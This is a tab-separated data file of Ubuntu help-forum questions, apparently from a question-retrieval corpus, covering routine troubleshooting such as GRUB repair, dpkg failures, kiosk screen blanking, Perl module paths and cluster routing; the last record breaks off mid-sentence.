493565	ajust screenblank timeout on firefox kiosk	i have a ubuntu 14.04 set up as a kiosk that starts firefox in /etc/init/x.conf like this : exec su -c `` startx /etc/x11/xsession /home/kiosk/kiosk.sh -- '' kiosk ( see details here : how to make ubuntu 14.04 a kiosk ) i want the screen to stay on for 60 minutes before going blank , however i hav n't been able to overrule the default 10 minutes limit . this is what i have tried ( non worked ) : in lightdm screen blank options is set to 60 minutes for the kiosk user i have tried to add an /home/kiosk/.xinitrc file with xset options i have tried to add an xauthority=/home/kiosk/.xauthority xset -display :0.0 s off in my kiosk start script i have tried to add /etc/x11/xorg.conf with option `` blanktime '' `` 60 '' does anyone know what is the correct way to configure screen blank time when starting x with startx from a shell script ? thanks
493569	why does my program not execute a perl file	i have a perl file name make_html.pl which works on a module named api : :pdf2 ( link ) i downloaded it installed it and i think i set the path wrong . my @ inc has the values built under linux compiled at feb 4 2014 22:52:09 % env : perl5lib= '' /home/lib-11//downloads/mirdeep2/lib/pdf : /home/lib-11//downloads/mirdeep2/lib/pdf '' @ inc : /home/lib-11//downloads/mirdeep2/lib/pdf /home/lib-11//downloads/mirdeep2/lib/pdf /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . when i run make_html.pl the error i get is ca n't locate pdf/api2.pm in @ inc ( @ inc contains : /home/lib-11//downloads/mirdeep2/lib/pdf /home/lib-11//downloads/mirdeep2/lib/pdf /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at /home/lib-11/downloads/mirdeep2/make_html.pl line 9 . begin failed -- compilation aborted at /home/lib-11/downloads/mirdeep2/make_html.pl line 9 how do i take out all the repeating paths . i know where i installed the module but i am unsure as to which part of the module i need to extend the path to . there are 3 - 4 folders inside the main module folder . i am just a beginner in linux so use simple terms please . i use ubuntu 12.04lts . edit i just noticed an error in the path where i have inserted two forward slashes between lib-11 and downloads in the path . but how do i rectify the error now ?
493572	regular expression that matches all multiple seperate expressions	it 's admission time in india and i am trying my best to get the best college i can for engg . i have got a pdf file which contains a table which looks like it contains about 2500+ entries and i have 3 days time . so to do some smart work sorting out the right colleges for me , i need to match the contents to multiple regexp , like should contain either of the words `` computer '' or `` information '' should contain both ge and false should match the regexp [ 0-9 ] { 5 , } i first tried opening it in libreoffice calc but it opens in libreoffice draw . i tried pdftohtml and pdftotext but both mess it badly . finally i came at pdfgrep , but it does not work in combination with grep as , pdfgrep regexp1 ./locn to file|grep regexp2|grep regexp3 gives error binary file ( standard input ) matches so whatever i have to do is with a single regexp to be put in pdfgrep , which will match all regexp 's that i need . edit : you can download the pdf here .
493574	how can i confirm that the binaries in my ubuntu are from the source code it should be from ?	like 99 % of users , i install ubuntu from ready-made binaries . how can i verify myself that those binaries are in fact from the original source code from ubuntu ? it would be good to verify that nsa/someone has not collaborated with either ubuntu or linode ( my vps provider ) to mess with the binaries . if we could verify the binaries , they would also be unlikely to attempt this in the first place as it would be easy to call them out on it .
493576	wireless problems	i have ubuntu 14.04 and have n't had any problems at all , but yesterday i got a new router and suddenly it ca n't find the network on the network list , and if i go in to settings > network > wireless it shows the network but says it 's out of range . i have surfed the web and tryed countless of options , but nothing works . is it possible to make it work without reinstalling ubuntu from scratch ?
493583	apt-get upgrade fails with `` adduser : the user `messagebus ' already exists . exiting . ''	got this today when trying to upgrade the software on my ubuntu 12.04 server : # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? setting up dbus ( 1.4.18-1ubuntu1.5 ) ... adduser : the user `messagebus ' already exists . exiting . dpkg : error processing dbus ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of dbus-x11 : dbus-x11 depends on dbus ; however : package dbus is not configured yet . dpkg : error processing dbus-x11 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : dbus dbus-x11 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm tempted to delete the user messagebus and retry . would that be a good way to fix this ? or do you have other suggestions ?
493584	convert images to pdf	i have saved multiple images from google books . i wanted to convert them to a single pdf file , where in i need some inputs . the below two images ( one png and one jpeg ) are two continuous pages . first page ( png ) second page ( jpeg ) i save them in my system . i converted them to pdf using the command below convert books.png books.jpeg combined.pdf however the combined.pdf is not giving me expected results , not the combination of the two . i also tried making individual pdf files , then combining them using pdftk , with no luck convert books.png book1.pdf convert books.jpeg book2.pdf pdftk book1.pdf book2.pdf cat output combined.pdf
493588	how far is my partition resize ?	i 'm in the process of installing xubuntu , and it has been resizing the windows xp fat32 partition for a few hours . is there any way to find out how far it is , or if it is even still partitioning , or hanging ? i 'm just using the partitioner built into the xubuntu installer . the partman log says this : parted_server : resize_partition ( openfs=true ) parted_server : opened file system : yes parted_server : try to check the file system for errors /lib/partman/active_partition/80resize/do_option : error_handler : exception with type timer parted_server : out : timer parted_server : out : 0 ( null ) parted_server : out : ready parted_server : successfully checked /lib/partman/active_partition/80resize/do_option : error_handler : exception with type timer parted_server : out : timer parted_server : out : 0 ( null ) edit : i ca n't hear the hard disk doing anything at all either , but i do n't want to reboot .
493590	hbase master not running in pseudo-distributed mode	i am trying to run hbase in a pseudo-distributed mode . i followed the link http : //archanaschangale.wordpress.com/2013/08/31/installing-pseudo-distributed-hbase-on-ubuntu/ i am using ubuntu version 12.04 hbase version 0.94.8 hadoop version 2.4.0 in hbase/conf/hbase-env.sh , i added the following export java_home=/usr/lib/jvm/jdk1.7.0_25 export hbase_regionservers=/usr/lib/hbase/hbase-0.94.8/conf/regionservers export hbase_manages_zk=true then i set the hbase_home path in bashrc file in hbase/conf/hbase-site.xml i added the following , < configuration > < property > < name > hbase.rootdir < /name > < value > hdfs : //localhost:9000/hbase < /value > < /property > < property > < name > hbase.cluster.distributed < /name > < value > true < /value > < /property > < property > < name > hbase.zookeeper.quorum < /name > < value > localhost < /value > < /property > < property > < name > dfs.replication < /name > < value > 1 < /value > < /property > < property > < name > hbase.zookeeper.property.clientport < /name > < value > 2181 < /value > < /property > < property > < name > hbase.zookeeper.property.datadir < /name > < value > /home/prashasti/installed/hbase-0.94.8/hbase/zookeeper < /value > < /property > < /configuration > to prevent version mismatch between hadoop and hbase , i added hadoop-common-2.4.0.jar and hadoop-mapreduce-client-core-2.4.0.jar in hbase/lib folder when i start hbase using $ ./bin/start-hbase.sh no error turns up , but the hmaster does n't start .
493592	how to deactivate the `` network disconnected '' popup ?	we have network problems at our company and the network is often disconnected . at each disconnection ubuntu ( 12.04 ) displays a pop-up in the right corner of the screen to inform me of this event . this is really annoying when it comes very often . how do i deactivate this ?
493595	is there a `` settings history '' , or a log of changes in configuration ?	p.s . i have just found is it possible to monitor dconf for changes ? it , together with the answer by volker siegel , answers my question . a note for xubuntu users : some settings are not in dconf , but in xfconf . p.p.s . related : how to keep `` dot files '' under version control ? best way to backup all settings , list of installed packages , tweaks , etc ? original question : when troubleshooting , sometimes i wish the application remembered : what exactly has the user changed in its settings recently . i wonder : does anybody know any application that has something like the log of changes of its settings ? the most similar things i knew about are : apt/history.log ( but that is the installations history ) prefs.js of firefox ( but that is the union of all changes = without time ) .
493597	mc strange symbol when pressing the `` , '' key	when i edit a file and press the , key i get on screen `` âqâ€ž6ĺ„ăşĺă“tv ! ; â€¦â´â¶äĺąâ€ťă˘9 '' . this happened today and only under midnight commander ; the other keys are ok .
493603	how can i add a message after the `` last login '' shown when starting san ssh connection ?	i ca n't find how to add a message after the `` last login ... '' line on my ubuntu 14.04 . i can edit everything before using the files in /etc/update-motd.d/ and i can show/hide the last login message using the config file /etc/ssh/sshd_config . but how can i add something after that ? . or , alternatively , how can i edit the last login message ?
493606	i am unable to see windows 8 partition	i 've installed windows 8 on my pavilion g6 laptop . secure boot is disabled . i am able to boot from ubuntu but unable to see the windows 8 partition . i am able to see the whole hdd as available space , i wo n't get the option to install alongside windows8 please help
493607	reliable usb wireless adapter	i am aware that questions that are considered as subjective , will not be allowed on this forum . but , the following question i have is very specific , because of the way i constructed this question ( to avoid being subjective ) , and the answer could be useful to many like me , who are moving to ubuntu 14.04 , but stuck at the networking step . i have searched long and hard on the net , to find an answer . but after many hours spent , i could not find anything . posting this question in ubuntu forum , did not produce any answer either . so , i created this account here , as a final resort . i hope the admins will not close this thread . i am newbie to ubuntu & linux . i want to setup my windows 7 pc for ubuntu . this machine will run both windows 7 and ubuntu 14.04 ( booted from a usb drive ) , when i finally set it up . during my preparation , i noticed that there are lot of questions on the net about usb wireless adapters not working with ubuntu . i want to buy a wireless usb adapter that will be compatible and has been tested on ubuntu 14.04. not only compatible , but more importantly , will work reliably without dropping connection everyday . will run in n300 or n150 ( second choice ) protocol . currently my other machines are on wpa2-psk ( aes encryption ) . so i would like the same in this new usb stick . will also work reliably when the machine boots in windows 7 mode . i tend to run this machine continuously ; so i need a wireless usb stick that will run for atleast a few days , without disconnections . if you have come across a usb for 14.04 , that meets all or some of the above criteria , please let me know . i have to buy this usb ( hopefully from local frys store ) as soon as possible . i am using a netgear ( n 300 speed ) router , and so it would be nice if i can find a netgear usb wireless adapter . from past experience i know that it would be a safer bet , when the router and desktop receiver are paired from the same company . so , i am leaning towards netgear , but am not tied to the brand , if i can find a reliable usb dongle that works on both windows and ubuntu 14.04 . looking forward to preparing my ubuntu bootable usb drive tomorrow . thanks for any leads .
493609	acer revo 3700 display issue	acer revo 3700 when connected to a pc moniter i have no issues . i took the unit down to connect to my sony flat via hdmi . when i powered on the machine it booted up , the purple screen , ubuntu logo then it goes into a black screen . asks for username , then password . the only option is to ctrl alt and del , which restarts and through the same cycle . any idea what the issue maybe > thanks
493611	grub rescue windows 8 & ubuntu dual boot	i deleted 2 partitions on my hard disk and now , i am unable to boot my pc . the error showing is `` no such partition '' and a grub rescue command prompt appears . i do not have windows 8 installation cd and i am stuck . if anyone could give me any guidance on the necessary steps , it would be great.thanks .
493612	how to reinstall grub	in my computer i had 2 partitions of windows 7 ( classical c : and d : ) , ubuntu gnome ( that i standardly use when i need to code ) and some old fedora partitions that i do n't use anymore and that i was planning to delete . i wanted to resize my 2 w7 partitions to give more space to c : . however , when i wanted to restart my computer , i had the `` grub rescue '' issue . so i used a bootable usb key ( ubuntu 14.04 ) and tried several solutions i could find online , for example how can i repair grub ? ( how to get ubuntu back after installing windows ? ) , i tried using boot-repair ... but each time i am stopped by the same kind of error : the packets `` grub-pc '' , `` grub-common '' , `` grub '' ... do n't have any version that could be installed , according to apt-get . the only thing i managed to do without errors is sudo grub-install -- boot-directory=/media/sda5 /dev/sda and what it did is changing my error to `` minimal bash-like line editing is supported '' when i reboot . i am aware that this is a widely-discussed problem , but i am unable to correct the problem on my computer . i even feel that i am making it worse . a small part of my sudo fdisk -l : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xbf16e21c device boot start end blocks id system /dev/sda1 2048 52430847 26214400 1c hidden w95 fat32 ( lba ) /dev/sda2 * 52430848 979963903 463766528 7 hpfs/ntfs/exfat /dev/sda3 979963904 1054484479 37260288 7 hpfs/ntfs/exfat /dev/sda4 1054484479 1465147391 205331456+ f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 1054484480 1380587519 163051520 83 linux /dev/sda6 1380589568 1413945343 16677888 82 linux swap / solaris /dev/sda7 1413947392 1414971391 512000 83 linux /dev/sda8 1414973440 1465147391 25086976 8e linux lvm disk /dev/mapper/fedora-swap : 8371 mb , 8371830784 bytes 255 heads , 63 sectors/track , 1017 cylinders , total 16351232 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/fedora-swap does n't contain a valid partition table disk /dev/mapper/fedora-root : 17.3 gb , 17314086912 bytes 255 heads , 63 sectors/track , 2104 cylinders , total 33816576 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/fedora-root does n't contain a valid partition table disk /dev/sdb : 4009 mb , 4009754624 bytes 145 heads , 48 sectors/track , 1125 cylinders , total 7831552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 48 7831551 3915752 b w95 fat32 edit : i do n't know if it is relevant , but the first time i tried boot-repair , i purged grub on sda5 ( as asked , i 've just copypasted what was asked to ) , and then i had my `` no version '' problem . now , it just says `` grub2 purge cancelled '' when i start it . lvs : lv vg attr lsize pool origin data % move log copy % convert root fedora -wi-a -- -- 16,12g swap fedora -wi-a -- -- 7,80g
493617	printer driver issue - install from repository failed epson stylus sx425w	i have tried to install my printer from the repositories using synaptic and it failed with the following output : ( synaptic:5958 ) : glib-critical ** : g_child_watch_add_full : assertion 'pid > 0 ' failed debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable selecting previously unselected package libsigsegv2 : i386 . ( reading database ... 209196 files and directories currently installed . ) preparing to unpack ... /libsigsegv2_2.10-2_i386.deb ... unpacking libsigsegv2 : i386 ( 2.10-2 ) ... selecting previously unselected package dpkg-dev . preparing to unpack ... /dpkg-dev_1.17.5ubuntu5.3_all.deb ... unpacking dpkg-dev ( 1.17.5ubuntu5.3 ) ... selecting previously unselected package po-debconf . preparing to unpack ... /po-debconf_1.0.16+nmu2ubuntu1_all.deb ... unpacking po-debconf ( 1.0.16+nmu2ubuntu1 ) ... selecting previously unselected package dh-apparmor . preparing to unpack ... /dh-apparmor_2.8.95~2430-0ubuntu5_all.deb ... unpacking dh-apparmor ( 2.8.95~2430-0ubuntu5 ) ... selecting previously unselected package debhelper . preparing to unpack ... /debhelper_9.20131227ubuntu1_all.deb ... unpacking debhelper ( 9.20131227ubuntu1 ) ... selecting previously unselected package librpmio3 . preparing to unpack ... /librpmio3_4.11.1-3_i386.deb ... unpacking librpmio3 ( 4.11.1-3 ) ... selecting previously unselected package librpm3 . preparing to unpack ... /librpm3_4.11.1-3_i386.deb ... unpacking librpm3 ( 4.11.1-3 ) ... selecting previously unselected package librpmbuild3 . preparing to unpack ... /librpmbuild3_4.11.1-3_i386.deb ... unpacking librpmbuild3 ( 4.11.1-3 ) ... selecting previously unselected package librpmsign1 . preparing to unpack ... /librpmsign1_4.11.1-3_i386.deb ... unpacking librpmsign1 ( 4.11.1-3 ) ... selecting previously unselected package rpm-common . preparing to unpack ... /rpm-common_4.11.1-3_i386.deb ... unpacking rpm-common ( 4.11.1-3 ) ... selecting previously unselected package rpm2cpio . preparing to unpack ... /rpm2cpio_4.11.1-3_i386.deb ... unpacking rpm2cpio ( 4.11.1-3 ) ... selecting previously unselected package debugedit . preparing to unpack ... /debugedit_4.11.1-3_i386.deb ... unpacking debugedit ( 4.11.1-3 ) ... selecting previously unselected package rpm . preparing to unpack ... /archives/rpm_4.11.1-3_i386.deb ... unpacking rpm ( 4.11.1-3 ) ... selecting previously unselected package alien . preparing to unpack ... /archives/alien_8.90_all.deb ... unpacking alien ( 8.90 ) ... selecting previously unselected package at . preparing to unpack ... /at_3.1.14-1ubuntu1_i386.deb ... unpacking at ( 3.1.14-1ubuntu1 ) ... selecting previously unselected package g++-4.8 . preparing to unpack ... /g++-4.8_4.8.2-19ubuntu1_i386.deb ... unpacking g++-4.8 ( 4.8.2-19ubuntu1 ) ... selecting previously unselected package g++ . preparing to unpack ... /g++_4 % 3a4.8.2-1ubuntu6_i386.deb ... unpacking g++ ( 4:4.8.2-1ubuntu6 ) ... selecting previously unselected package build-essential . preparing to unpack ... /build-essential_11.6ubuntu6_i386.deb ... unpacking build-essential ( 11.6ubuntu6 ) ... selecting previously unselected package libfakeroot : i386 . preparing to unpack ... /libfakeroot_1.20-3ubuntu2_i386.deb ... unpacking libfakeroot : i386 ( 1.20-3ubuntu2 ) ... selecting previously unselected package fakeroot . preparing to unpack ... /fakeroot_1.20-3ubuntu2_i386.deb ... unpacking fakeroot ( 1.20-3ubuntu2 ) ... selecting previously unselected package heirloom-mailx . preparing to unpack ... /heirloom-mailx_12.5-2_i386.deb ... unpacking heirloom-mailx ( 12.5-2 ) ... selecting previously unselected package libalgorithm-diff-perl . preparing to unpack ... /libalgorithm-diff-perl_1.19.02-3_all.deb ... unpacking libalgorithm-diff-perl ( 1.19.02-3 ) ... selecting previously unselected package libalgorithm-diff-xs-perl . preparing to unpack ... /libalgorithm-diff-xs-perl_0.04-2build4_i386.deb ... unpacking libalgorithm-diff-xs-perl ( 0.04-2build4 ) ... selecting previously unselected package libalgorithm-merge-perl . preparing to unpack ... /libalgorithm-merge-perl_0.08-2_all.deb ... unpacking libalgorithm-merge-perl ( 0.08-2 ) ... selecting previously unselected package libsys-hostname-long-perl . preparing to unpack ... /libsys-hostname-long-perl_1.4-3_all.deb ... unpacking libsys-hostname-long-perl ( 1.4-3 ) ... selecting previously unselected package libmail-sendmail-perl . preparing to unpack ... /libmail-sendmail-perl_0.79.16-1_all.deb ... unpacking libmail-sendmail-perl ( 0.79.16-1 ) ... selecting previously unselected package libpod-plainer-perl . preparing to unpack ... /libpod-plainer-perl_1.03-1_all.deb ... unpacking libpod-plainer-perl ( 1.03-1 ) ... selecting previously unselected package m4 . preparing to unpack ... /m4_1.4.17-2ubuntu1_i386.deb ... unpacking m4 ( 1.4.17-2ubuntu1 ) ... selecting previously unselected package ncurses-term . preparing to unpack ... /ncurses-term_5.9+20140118-1ubuntu1_all.deb ... unpacking ncurses-term ( 5.9+20140118-1ubuntu1 ) ... selecting previously unselected package pax . preparing to unpack ... /pax_1 % 3a20120606-2+deb7u1_i386.deb ... unpacking pax ( 1:20120606-2+deb7u1 ) ... selecting previously unselected package lsb-invalid-mta . preparing to unpack ... /lsb-invalid-mta_4.1+debian11ubuntu6_all.deb ... unpacking lsb-invalid-mta ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-security . preparing to unpack ... /lsb-security_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-security ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-core . preparing to unpack ... /lsb-core_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-core ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-graphics . preparing to unpack ... /lsb-graphics_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-graphics ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-cxx . preparing to unpack ... /lsb-cxx_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-cxx ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-multimedia . preparing to unpack ... /lsb-multimedia_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-multimedia ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-desktop . preparing to unpack ... /lsb-desktop_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-desktop ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-printing . preparing to unpack ... /lsb-printing_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-printing ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb-languages . preparing to unpack ... /lsb-languages_4.1+debian11ubuntu6_i386.deb ... unpacking lsb-languages ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package lsb . preparing to unpack ... /lsb_4.1+debian11ubuntu6_all.deb ... unpacking lsb ( 4.1+debian11ubuntu6 ) ... selecting previously unselected package epson-inkjet-printer-nx420 . preparing to unpack ... /epson-inkjet-printer-nx420_1.0.0-1lsb3.2_i386.deb ... unpacking epson-inkjet-printer-nx420 ( 1.0.0-1lsb3.2 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing package man-db ( -- unpack ) : subprocess installed post-installation script returned error exit status 1 processing triggers for doc-base ( 0.10.5 ) ... processing 1 added doc-base file ... registering documents with scrollkeeper ... processing triggers for ureadahead ( 0.100.0-16 ) ... ureadahead will be reprofiled on next reboot processing triggers for install-info ( 5.2.0.dfsg.1-2 ) ... errors were encountered while processing : man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up man-db ( 2.6.7.1-1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing package man-db ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up g++-4.8 ( 4.8.2-19ubuntu1 ) ... setting up dh-apparmor ( 2.8.95~2430-0ubuntu5 ) ... dpkg : dependency problems prevent configuration of debhelper : debhelper depends on man-db ( > = 2.5.1-1 ) ; however : package man-db is not configured yet . dpkg : error processing package debhelper ( -- configure ) : dependency problems - leaving unconfigured setting up dpkg-dev ( 1.17.5ubuntu5.3 ) ... dpkg : dependency problems prevent configuration of lsb-core : lsb-core depends on man-db ; however : package man-db is not configured yet . dpkg : error processing package lsb-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lsb-multimedia : lsb-multimedia depends on lsb-core ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-core is not configured yet . dpkg : error processing package lsb-multimedia ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lsb-printing : lsb-printing depends on lsb-core ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-core is not configured yet . dpkg : error processing package lsb-printing ( -- configure ) : dependency problems - leaving unconfigured setting up libsigsegv2 : i386 ( 2.10-2 ) ... setting up librpmio3 ( 4.11.1-3 ) ... setting up libsys-hostname-long-perl ( 1.4-3 ) ... setting up g++ ( 4:4.8.2-1ubuntu6 ) ... update-alternatives : using /usr/bin/g++ to provide /usr/bin/c++ ( c++ ) in auto mode setting up at ( 3.1.14-1ubuntu1 ) ... atd start/running , process 6483 setting up libfakeroot : i386 ( 1.20-3ubuntu2 ) ... setting up libalgorithm-diff-perl ( 1.19.02-3 ) ... setting up fakeroot ( 1.20-3ubuntu2 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode dpkg : dependency problems prevent configuration of lsb-desktop : lsb-desktop depends on lsb-multimedia ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-multimedia is not configured yet . dpkg : error processing package lsb-desktop ( -- configure ) : dependency problems - leaving unconfigured setting up libpod-plainer-perl ( 1.03-1 ) ... setting up ncurses-term ( 5.9+20140118-1ubuntu1 ) ... setting up lsb-security ( 4.1+debian11ubuntu6 ) ... setting up lsb-invalid-mta ( 4.1+debian11ubuntu6 ) ... dpkg : dependency problems prevent configuration of lsb-graphics : lsb-graphics depends on lsb-core ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-core is not configured yet . dpkg : error processing package lsb-graphics ( -- configure ) : dependency problems - leaving unconfigured setting up build-essential ( 11.6ubuntu6 ) ... dpkg : dependency problems prevent configuration of lsb : lsb depends on lsb-core ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-core is not configured yet . lsb depends on lsb-graphics ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-graphics is not configured yet . lsb depends on lsb-desktop ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-desktop is not configured yet . lsb depends on lsb-printing ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-printing is not configured yet . dpkg : error processing package lsb ( -- configure ) : dependency problems - leaving unconfigured setting up libmail-sendmail-perl ( 0.79.16-1 ) ... setting up librpm3 ( 4.11.1-3 ) ... setting up heirloom-mailx ( 12.5-2 ) ... update-alternatives : using /usr/bin/heirloom-mailx to provide /usr/bin/mailx ( mailx ) in auto mode setting up libalgorithm-merge-perl ( 0.08-2 ) ... dpkg : dependency problems prevent configuration of lsb-languages : lsb-languages depends on lsb-core ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-core is not configured yet . dpkg : error processing package lsb-languages ( -- configure ) : dependency problems - leaving unconfigured setting up pax ( 1:20120606-2+deb7u1 ) ... setting up po-debconf ( 1.0.16+nmu2ubuntu1 ) ... setting up m4 ( 1.4.17-2ubuntu1 ) ... dpkg : dependency problems prevent configuration of lsb-cxx : lsb-cxx depends on lsb-core ( > = 4.1+debian11ubuntu6 ) ; however : package lsb-core is not configured yet . dpkg : error processing package lsb-cxx ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of alien : alien depends on debhelper ( > = 7 ) ; however : package debhelper is not configured yet . dpkg : error processing package alien ( -- configure ) : dependency problems - leaving unconfigured setting up debugedit ( 4.11.1-3 ) ... dpkg : dependency problems prevent configuration of epson-inkjet-printer-nx420 : epson-inkjet-printer-nx420 depends on lsb ( > = 3.2 ) ; however : package lsb is not configured yet . dpkg : error processing package epson-inkjet-printer-nx420 ( -- configure ) : dependency problems - leaving unconfigured setting up librpmbuild3 ( 4.11.1-3 ) ... setting up rpm-common ( 4.11.1-3 ) ... setting up libalgorithm-diff-xs-perl ( 0.04-2build4 ) ... setting up rpm2cpio ( 4.11.1-3 ) ... setting up librpmsign1 ( 4.11.1-3 ) ... setting up rpm ( 4.11.1-3 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... errors were encountered while processing : man-db debhelper lsb-core lsb-multimedia lsb-printing lsb-desktop lsb-graphics lsb lsb-languages lsb-cxx alien epson-inkjet-printer-nx420 can anyone help ?
493622	corrupted mac on input	we are getting the corrupted mac on input while downloading android source . server configuration : processor : 10 core @ 2.40ghz x 2 processor ram : 157 gb network : 8 ports bonded with bond-mode balance-rr ( 1gbps x 8 ) os : ubuntu 10.04.4 openssh-server : 1:5.3p1-3ubuntu7.1 free -g total used free shared buffers cached mem : 157 157 0 0 0 19 -/+ buffers/cache : 136 20 swap : 93 0 92 vmstat -s 165378288 k total memory 164951264 k used memory 144654128 k active memory 15985236 k inactive memory 427028 k free memory 834420 k buffer memory 20680144 k swap cache 97655800 k total swap 415652 k used swap 97240144 k free swap 339378930 non-nice user cpu ticks 206 nice user cpu ticks 25760487 system cpu ticks 3822902915 idle cpu ticks 21509311 io-wait cpu ticks 92795 irq cpu ticks 13789432 softirq cpu ticks 0 stolen cpu ticks 30141246663 pages paged in 6871171812 pages paged out 6152422 pages swapped in 5653996 pages swapped out 806220222 interrupts 313764060 cpu context switches 1403858828 boot time 11627079 forks am i missing something here ? please help me to fix this issue . regards praveen
493623	routing in computing cluster	i 'm trying to set up a computing cluster composed of four nodes . each node have 2 interfaces p1p1 and p2p1 . the first node - head node - should be visible form the outer world . it should route all movement to and from slave nodes . slave nodes should have internet connection via head node . head node /etc/network/interfaces . i believe that last line is problematic . auto lo iface lo inet loopback auto p1p1 iface p1p1 inet static address 192.0.137.14 netmask 255.255.255.224 gateway 192.0.127.1 dns-nameservers 194.0.61.14 dns-search my.domain.com auto p2p1 iface p2p1 inet static address 10.10.10.1 netmask 255.255.255.0 network 10.10.10.0 post-up route add -net 10.10.10.0/24 gw 10.10.10.1 head node routing table : route -n kernel ip routing table destination gateway genmask flags metric ref use iface default 192.0.137.1 0.0.0.0 ug 0 0 0 p1p1 10.10.10.0 * 255.255.255.0 u 0 0 0 p2p1 10.10.10.0 * 255.255.255.0 u 0 0 0 p2p1 192.0.137.0 * 255.255.255.224 u 0 0 0 p1p1 slave node /etc/network/interfaces auto lo iface lo inet loopback auto p1p1 iface p1p1 inet static address 10.10.10.2 netmask 255.255.255.0 gateway 10.10.10.1 slave node routing table : route -n kernel ip routing table destination gateway genmask flags metric ref use iface default 10.10.10.1 0.0.0.0 ug 0 0 0 p1p1 10.10.10.0 * 255.255.255.0 u 0 0 0 p1p1 i can ssh from outer world to head node and again ssh from head node to slave node , but i can not ping anything from slave node . it does n't matter if i ping domain name or ip address . system : root @ troll-0 : /home/michal # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty i found also this : ubuntu server routing table but it did n't help .
493626	is it possible to direct a single audio stream to a seperate output device ?	i listen a streaming radio broadcast on my ubuntu-gnome pc most of the day . i 'd like to send its output to my desktop speakers , while continuing to send the rest of the output to my headphones . would it be possible to direct a single audio stream to a specific output device , while allowing all others to continue to use the default ?
493627	power button shutdown permission override	i realise there are several questions about power button options , but this is a little different . on my system , shared with my family , i have disabled shutdown from the device menu , users may only log out . power is managed separately , to prevent accidental shutdowns if ssh is active , or someone is streaming to the tv etc . instead the computer monitors logins and connections , and will sleep after 20 minutes of inactivity . i have disabled the shutdown by adding : [ disable lightdm powermgmt ] identity=unix-user : * action=org.freedesktop.login1.reboot ; org.freedesktop.login1.reboot-multiple-sessions ; org.freedesktop.login1.power-off ; org.freedesktop.login1.power-off-multiple-sessions ; org.freedesktop.login1.suspend ; org.freedesktop.login1.suspend-multiple-sessions ; org.freedesktop.login1.hibernate ; org.freedesktop.login1.hibernate-multiple-sessions resultany=no resultinactive=no resultactive=no to /etc/polkit-1/localauthority/50-local.d/disable-shutdown.pkla this works as expected . however , i would like to override this policy when the power button itself is pressed - there are times when someone wants the computer to shutdown 